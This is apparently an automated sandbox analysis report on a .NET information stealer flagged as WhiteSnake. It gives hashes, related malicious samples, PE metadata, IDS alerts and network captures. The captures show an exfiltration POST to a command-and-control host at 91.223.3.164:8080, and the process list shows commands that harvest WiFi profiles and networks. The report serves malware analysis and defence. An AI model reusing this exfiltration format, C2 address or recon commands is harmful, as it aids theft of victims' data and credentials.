Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
VT rate limit hit for: file.exe

Simulations

Behavior and APIs

Time	Type	Description
18:06:59	API Interceptor	15x Sleep call for process: file.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
208.95.112.1	4tuMnSBgXFwIxMP.exe	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
	20092837.exe	Get hash	malicious	GuLoader	Browse	ip-api.com/line/?fields=hosting
	dg4Bwri6Cy.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	ip-api.com/line/?fields=hosting
	DHOYXfCAeB.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	ip-api.com/line/?fields=hosting
	tfz7ikR76n.exe	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
	RgAm3scap8.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	ip-api.com/line/?fields=hosting
	173088012436cb09e4ff67d5495bafb892243773781ebe8236073aca4dd15efcce792bb9ed419.dat-decoded.exe	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
	aviso de transferencia de pago.xlam.xlsx	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
	REnBTVfW8q.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	ip-api.com/line/?fields=hosting
	ulf4JrCRk2.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	ip-api.com/line/?fields=hosting

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ip-api.com	4tuMnSBgXFwIxMP.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	20092837.exe	Get hash	malicious	GuLoader	Browse	208.95.112.1
	dg4Bwri6Cy.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	208.95.112.1
	DHOYXfCAeB.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	208.95.112.1
	tfz7ikR76n.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	RgAm3scap8.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	208.95.112.1
	173088012436cb09e4ff67d5495bafb892243773781ebe8236073aca4dd15efcce792bb9ed419.dat-decoded.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	aviso de transferencia de pago.xlam.xlsx	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	REnBTVfW8q.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	208.95.112.1
	ulf4JrCRk2.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	208.95.112.1

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TUT-ASUS	4tuMnSBgXFwIxMP.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	20092837.exe	Get hash	malicious	GuLoader	Browse	208.95.112.1
	dg4Bwri6Cy.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	208.95.112.1
	DHOYXfCAeB.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	208.95.112.1
	tfz7ikR76n.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	RgAm3scap8.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	208.95.112.1
	173088012436cb09e4ff67d5495bafb892243773781ebe8236073aca4dd15efcce792bb9ed419.dat-decoded.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	aviso de transferencia de pago.xlam.xlsx	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	REnBTVfW8q.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	208.95.112.1
	ulf4JrCRk2.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	208.95.112.1
PL-SKYTECH-ASPL	Payload 94.75 (3).225.exe	Get hash	malicious	Unknown	Browse	95.214.53.96
	4b7b5bc7b0d1f70adf6b80390f1273723c409b837c957.dll	Get hash	malicious	Unknown	Browse	193.34.212.14
	4b7b5bc7b0d1f70adf6b80390f1273723c409b837c957.dll	Get hash	malicious	Unknown	Browse	193.34.212.14
	SH20240622902.scr.exe	Get hash	malicious	PureLog Stealer, zgRAT	Browse	193.34.212.15
	arm7.elf	Get hash	malicious	Unknown	Browse	95.214.52.167
	mpslbot.elf	Get hash	malicious	Unknown	Browse	95.214.52.167
	mipsbot.elf	Get hash	malicious	Unknown	Browse	95.214.52.167
	file.exe	Get hash	malicious	PureLog Stealer, zgRAT	Browse	193.34.212.15
	SecuriteInfo.com.Linux.Siggen.9999.17528.22528.elf	Get hash	malicious	Mirai	Browse	149.86.239.18
	MAERSK Release 242397734 SBK0000508124_pdf.exe	Get hash	malicious	Remcos	Browse	95.214.54.179

Process:	C:\Users\user\Desktop\file.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	1498
Entropy (8bit):	5.364175471524945
Encrypted:	false
SSDEEP:	24:ML9E4KQEAE4KKUNKKDE4KGKZI6KhPKIE4TKBGKoC1qE4GIs0E4K6sXE4Npv:MxHKQEAHKKkKYHKGSI6oPtHTHK1qHGI8
MD5:	1B713A2FD810C1C9A8F6F6BE36F406B1
SHA1:	0828576CB8B83C21F36AD29E327D845AB3574EBB
SHA-256:	E51E809582894F4D484939BE3990DFC914E43F4AF72AE55A00B01FCFE348763B
SHA-512:	D32200B7FA9D0DFEF4011D98D40260838A522E63C874FBCCE00D331D663169DBE1C613AD0E81C76F69A8CE6C7265605175CA75BA2C8BDA7748290B34579E148B
Malicious:	true
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567f

C:\Users\user\AppData\Local\nb3ruhpgao\report.lock

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

\Device\Null

Download File

Process:	C:\Windows\System32\timeout.exe
File Type:	ASCII text, with CRLF line terminators, with overstriking
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.41440934524794
Encrypted:	false
SSDEEP:	3:hYFqdLGAR+mQRKVxLZXt0sn:hYFqGaNZKsn
MD5:	3DD7DD37C304E70A7316FE43B69F421F
SHA1:	A3754CFC33E9CA729444A95E95BCB53384CB51E4
SHA-256:	4FA27CE1D904EA973430ADC99062DCF4BAB386A19AB0F8D9A4185FA99067F3AA
SHA-512:	713533E973CF0FD359AC7DB22B1399392C86D9FD1E715248F5724AAFBBF0EEB5EAC0289A0E892167EB559BE976C2AD0A0A0D8EFC407FFAF5B3C3A32AA9A0AAA4
Malicious:	false
Preview:	..Waiting for 3 seconds, press a key to continue ....2.1.0..

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	5.305868212280175
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.80% Win32 Executable (generic) a (10002005/4) 49.75% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Windows Screen Saver (13104/52) 0.07% Generic Win/DOS Executable (2004/3) 0.01%
File name:	file.exe
File size:	139'776 bytes
MD5:	cd0da55aa7811e92f71088f57df9a493
SHA1:	a9430383ea4500243858a74d51bc4dcb5eda23c2
SHA256:	0d503ceee2af7760bc677a71274ed2ba2c0b7d746f48fb816e091a7c92c55862
SHA512:	bf5d77ef88a13ae5ee18049331c83c78342ddd6a00cc738ffc70f9e05d216e7acbd691cb9358be39fddc658a40f7b813932c0d78f93e37f589df736ba9069ef6
SSDEEP:	3072:CaWWGbrPnlMV6u9bXuP087qRtNmo6mClbZCW:CTWGHdMgu9bXK0KqNmoCjC
TLSH:	FAD3D756B2919FA1C19E8DB691B2173003B559028F82FF055DDEF1902DD32D8EA236FB
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0.............N4... ...@....@.. ....................................`................................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x42344e
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0xE7D68599 [Fri Apr 3 11:16:41 2093 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x23400	0x4b	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x24000	0x730	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x26000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x21454	0x21600	d2afb0e6fa41b7bbff9b326f82691945	False	0.4170836259363296	data	5.321372026568063	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x24000	0x730	0x800	c2661203ed4bb47adf374d9e41c86311	False	0.4375	data	4.573334441128833	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x26000	0xc	0x200	4237e76e199d7ef0db06f4e6e9e6aade	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0x240a0	0x4a4	data			0.4797979797979798
RT_MANIFEST	0x24544	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-11-07T00:07:00.855825+0100	2050601	ET MALWARE [ANY.RUN] WhiteSnake Stealer HTTP Request	1	192.168.2.5	49705	91.223.3.164	8080	TCP
2024-11-07T00:07:00.914550+0100	2050602	ET MALWARE [ANY.RUN] WhiteSnake Stealer HTTP POST Report Exfiltration	1	192.168.2.5	49705	91.223.3.164	8080	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 7, 2024 00:06:59.434489012 CET	49704	80	192.168.2.5	208.95.112.1
Nov 7, 2024 00:06:59.439512014 CET	80	49704	208.95.112.1	192.168.2.5
Nov 7, 2024 00:06:59.439601898 CET	49704	80	192.168.2.5	208.95.112.1
Nov 7, 2024 00:06:59.450870991 CET	49704	80	192.168.2.5	208.95.112.1
Nov 7, 2024 00:06:59.456168890 CET	80	49704	208.95.112.1	192.168.2.5
Nov 7, 2024 00:07:00.041039944 CET	80	49704	208.95.112.1	192.168.2.5
Nov 7, 2024 00:07:00.085500956 CET	49704	80	192.168.2.5	208.95.112.1
Nov 7, 2024 00:07:00.496546984 CET	49705	8080	192.168.2.5	91.223.3.164
Nov 7, 2024 00:07:00.501462936 CET	8080	49705	91.223.3.164	192.168.2.5
Nov 7, 2024 00:07:00.502574921 CET	49705	8080	192.168.2.5	91.223.3.164
Nov 7, 2024 00:07:00.502748966 CET	49705	8080	192.168.2.5	91.223.3.164
Nov 7, 2024 00:07:00.507507086 CET	8080	49705	91.223.3.164	192.168.2.5
Nov 7, 2024 00:07:00.855824947 CET	49705	8080	192.168.2.5	91.223.3.164
Nov 7, 2024 00:07:00.860827923 CET	8080	49705	91.223.3.164	192.168.2.5
Nov 7, 2024 00:07:00.860841990 CET	8080	49705	91.223.3.164	192.168.2.5
Nov 7, 2024 00:07:00.860852003 CET	8080	49705	91.223.3.164	192.168.2.5
Nov 7, 2024 00:07:00.860868931 CET	8080	49705	91.223.3.164	192.168.2.5
Nov 7, 2024 00:07:00.860883951 CET	8080	49705	91.223.3.164	192.168.2.5
Nov 7, 2024 00:07:00.860888004 CET	8080	49705	91.223.3.164	192.168.2.5
Nov 7, 2024 00:07:00.860893965 CET	49705	8080	192.168.2.5	91.223.3.164
Nov 7, 2024 00:07:00.860913038 CET	49705	8080	192.168.2.5	91.223.3.164
Nov 7, 2024 00:07:00.860955000 CET	49705	8080	192.168.2.5	91.223.3.164
Nov 7, 2024 00:07:00.860990047 CET	8080	49705	91.223.3.164	192.168.2.5
Nov 7, 2024 00:07:00.861006975 CET	8080	49705	91.223.3.164	192.168.2.5
Nov 7, 2024 00:07:00.861016035 CET	8080	49705	91.223.3.164	192.168.2.5
Nov 7, 2024 00:07:00.861032009 CET	8080	49705	91.223.3.164	192.168.2.5
Nov 7, 2024 00:07:00.861047983 CET	49705	8080	192.168.2.5	91.223.3.164
Nov 7, 2024 00:07:00.861078024 CET	49705	8080	192.168.2.5	91.223.3.164
Nov 7, 2024 00:07:00.861093044 CET	49705	8080	192.168.2.5	91.223.3.164
Nov 7, 2024 00:07:00.865786076 CET	8080	49705	91.223.3.164	192.168.2.5
Nov 7, 2024 00:07:00.865823030 CET	8080	49705	91.223.3.164	192.168.2.5
Nov 7, 2024 00:07:00.865869045 CET	8080	49705	91.223.3.164	192.168.2.5
Nov 7, 2024 00:07:00.865875959 CET	49705	8080	192.168.2.5	91.223.3.164
Nov 7, 2024 00:07:00.865878105 CET	8080	49705	91.223.3.164	192.168.2.5
Nov 7, 2024 00:07:00.865926027 CET	8080	49705	91.223.3.164	192.168.2.5
Nov 7, 2024 00:07:00.865935087 CET	8080	49705	91.223.3.164	192.168.2.5
Nov 7, 2024 00:07:00.865935087 CET	49705	8080	192.168.2.5	91.223.3.164
Nov 7, 2024 00:07:00.865969896 CET	49705	8080	192.168.2.5	91.223.3.164
Nov 7, 2024 00:07:00.866004944 CET	49705	8080	192.168.2.5	91.223.3.164
Nov 7, 2024 00:07:00.914413929 CET	8080	49705	91.223.3.164	192.168.2.5
Nov 7, 2024 00:07:00.914550066 CET	49705	8080	192.168.2.5	91.223.3.164
Nov 7, 2024 00:07:00.965823889 CET	8080	49705	91.223.3.164	192.168.2.5
Nov 7, 2024 00:07:00.966051102 CET	49705	8080	192.168.2.5	91.223.3.164
Nov 7, 2024 00:07:01.013855934 CET	8080	49705	91.223.3.164	192.168.2.5
Nov 7, 2024 00:07:01.013919115 CET	49705	8080	192.168.2.5	91.223.3.164
Nov 7, 2024 00:07:01.061784983 CET	8080	49705	91.223.3.164	192.168.2.5
Nov 7, 2024 00:07:01.061850071 CET	49705	8080	192.168.2.5	91.223.3.164
Nov 7, 2024 00:07:01.113130093 CET	8080	49705	91.223.3.164	192.168.2.5
Nov 7, 2024 00:07:01.113331079 CET	49705	8080	192.168.2.5	91.223.3.164
Nov 7, 2024 00:07:01.118310928 CET	8080	49705	91.223.3.164	192.168.2.5
Nov 7, 2024 00:07:01.118323088 CET	8080	49705	91.223.3.164	192.168.2.5
Nov 7, 2024 00:07:01.118371964 CET	49705	8080	192.168.2.5	91.223.3.164
Nov 7, 2024 00:07:01.118398905 CET	8080	49705	91.223.3.164	192.168.2.5
Nov 7, 2024 00:07:01.118416071 CET	8080	49705	91.223.3.164	192.168.2.5
Nov 7, 2024 00:07:01.118426085 CET	8080	49705	91.223.3.164	192.168.2.5
Nov 7, 2024 00:07:01.118472099 CET	8080	49705	91.223.3.164	192.168.2.5
Nov 7, 2024 00:07:01.118534088 CET	8080	49705	91.223.3.164	192.168.2.5
Nov 7, 2024 00:07:01.118542910 CET	8080	49705	91.223.3.164	192.168.2.5
Nov 7, 2024 00:07:01.118546963 CET	8080	49705	91.223.3.164	192.168.2.5
Nov 7, 2024 00:07:01.118552923 CET	8080	49705	91.223.3.164	192.168.2.5
Nov 7, 2024 00:07:01.118669987 CET	8080	49705	91.223.3.164	192.168.2.5
Nov 7, 2024 00:07:01.118680000 CET	8080	49705	91.223.3.164	192.168.2.5
Nov 7, 2024 00:07:01.118689060 CET	8080	49705	91.223.3.164	192.168.2.5
Nov 7, 2024 00:07:01.118697882 CET	8080	49705	91.223.3.164	192.168.2.5
Nov 7, 2024 00:07:01.118709087 CET	8080	49705	91.223.3.164	192.168.2.5
Nov 7, 2024 00:07:01.118853092 CET	8080	49705	91.223.3.164	192.168.2.5
Nov 7, 2024 00:07:01.118886948 CET	8080	49705	91.223.3.164	192.168.2.5
Nov 7, 2024 00:07:01.118925095 CET	8080	49705	91.223.3.164	192.168.2.5
Nov 7, 2024 00:07:01.119177103 CET	8080	49705	91.223.3.164	192.168.2.5
Nov 7, 2024 00:07:01.123553038 CET	8080	49705	91.223.3.164	192.168.2.5
Nov 7, 2024 00:07:01.365212917 CET	8080	49705	91.223.3.164	192.168.2.5
Nov 7, 2024 00:07:01.413645983 CET	49705	8080	192.168.2.5	91.223.3.164
Nov 7, 2024 00:07:01.786674976 CET	8080	49705	91.223.3.164	192.168.2.5
Nov 7, 2024 00:07:01.786689997 CET	8080	49705	91.223.3.164	192.168.2.5
Nov 7, 2024 00:07:01.786758900 CET	49705	8080	192.168.2.5	91.223.3.164
Nov 7, 2024 00:07:03.771176100 CET	49705	8080	192.168.2.5	91.223.3.164
Nov 7, 2024 00:07:03.771632910 CET	49704	80	192.168.2.5	208.95.112.1

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 7, 2024 00:06:59.312458038 CET	64641	53	192.168.2.5	1.1.1.1
Nov 7, 2024 00:06:59.319263935 CET	53	64641	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 7, 2024 00:06:59.312458038 CET	192.168.2.5	1.1.1.1	0x34c	Standard query (0)	ip-api.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Nov 7, 2024 00:06:59.319263935 CET	1.1.1.1	192.168.2.5	0x34c	No error (0)	ip-api.com		208.95.112.1	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

ip-api.com

91.223.3.164:8080

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49704	208.95.112.1	80	3144	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Nov 7, 2024 00:06:59.450870991 CET	85	OUT	GET /line?fields=query,country HTTP/1.1 Host: ip-api.com Connection: Keep-Alive
Nov 7, 2024 00:07:00.041039944 CET	199	IN	HTTP/1.1 200 OK Date: Wed, 06 Nov 2024 23:06:59 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 29 Access-Control-Allow-Origin: * X-Ttl: 60 X-Rl: 44 Data Raw: 55 6e 69 74 65 64 20 53 74 61 74 65 73 0a 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 30 0a Data Ascii: United States173.254.250.80

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49705	91.223.3.164	8080	3144	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Nov 7, 2024 00:07:00.502748966 CET	250	OUT	POST /sendData?pk=OTVCRjJBMjUwMjY3RDQzMkU5RkNCQ0Q1OURFQzA5QTk=&ta=RGVmYXVsdA==&un=YWxmb25z&pc=MTM4NzI3&co=VW5pdGVkIFN0YXRlcw==&wa=MA==&be=MA== HTTP/1.1 Host: 91.223.3.164:8080 Content-Length: 148982 Expect: 100-continue Connection: Keep-Alive
Nov 7, 2024 00:07:01.365212917 CET	25	IN	HTTP/1.1 100 Continue
Nov 7, 2024 00:07:01.786674976 CET	126	IN	HTTP/1.1 200 OK Content-Length: 36 Content-Type: application/json Date: Wed, 06 Nov 2024 23:07:01 GMT Server: waitress

Target ID:	0
Start time:	18:06:56
Start date:	06/11/2024
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\file.exe"
Imagebase:	0x2067bea0000
File size:	139'776 bytes
MD5 hash:	CD0DA55AA7811E92F71088F57DF9A493
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	18:06:56
Start date:	06/11/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"cmd.exe" /c chcp 65001 && netsh wlan show profiles\|findstr /R /C:"[ ]:[ ]"
Imagebase:	0x7ff6ce510000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	18:06:56
Start date:	06/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	18:06:56
Start date:	06/11/2024
Path:	C:\Windows\System32\chcp.com
Wow64 process (32bit):	false
Commandline:	chcp 65001
Imagebase:	0x7ff740a70000
File size:	14'848 bytes
MD5 hash:	33395C4732A49065EA72590B14B64F32
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	18:06:56
Start date:	06/11/2024
Path:	C:\Windows\System32\netsh.exe
Wow64 process (32bit):	false
Commandline:	netsh wlan show profiles
Imagebase:	0x7ff7e8b80000
File size:	96'768 bytes
MD5 hash:	6F1E6DD688818BC3D1391D0CC7D597EB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	18:06:56
Start date:	06/11/2024
Path:	C:\Windows\System32\findstr.exe
Wow64 process (32bit):	false
Commandline:	findstr /R /C:"[ ]:[ ]"
Imagebase:	0x7ff798080000
File size:	36'352 bytes
MD5 hash:	804A6AE28E88689E0CF1946A6CB3FEE5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	18:06:57
Start date:	06/11/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid \| findstr "SSID BSSID Signal"
Imagebase:	0x7ff6ce510000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	18:06:57
Start date:	06/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	18:06:57
Start date:	06/11/2024
Path:	C:\Windows\System32\chcp.com
Wow64 process (32bit):	false
Commandline:	chcp 65001
Imagebase:	0x7ff740a70000
File size:	14'848 bytes
MD5 hash:	33395C4732A49065EA72590B14B64F32
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	18:06:57
Start date:	06/11/2024
Path:	C:\Windows\System32\netsh.exe
Wow64 process (32bit):	false
Commandline:	netsh wlan show networks mode=bssid
Imagebase:	0x7ff7e8b80000
File size:	96'768 bytes
MD5 hash:	6F1E6DD688818BC3D1391D0CC7D597EB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	18:06:57
Start date:	06/11/2024
Path:	C:\Windows\System32\findstr.exe
Wow64 process (32bit):	false
Commandline:	findstr "SSID BSSID Signal"
Imagebase:	0x7ff798080000
File size:	36'352 bytes
MD5 hash:	804A6AE28E88689E0CF1946A6CB3FEE5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	18:07:00
Start date:	06/11/2024
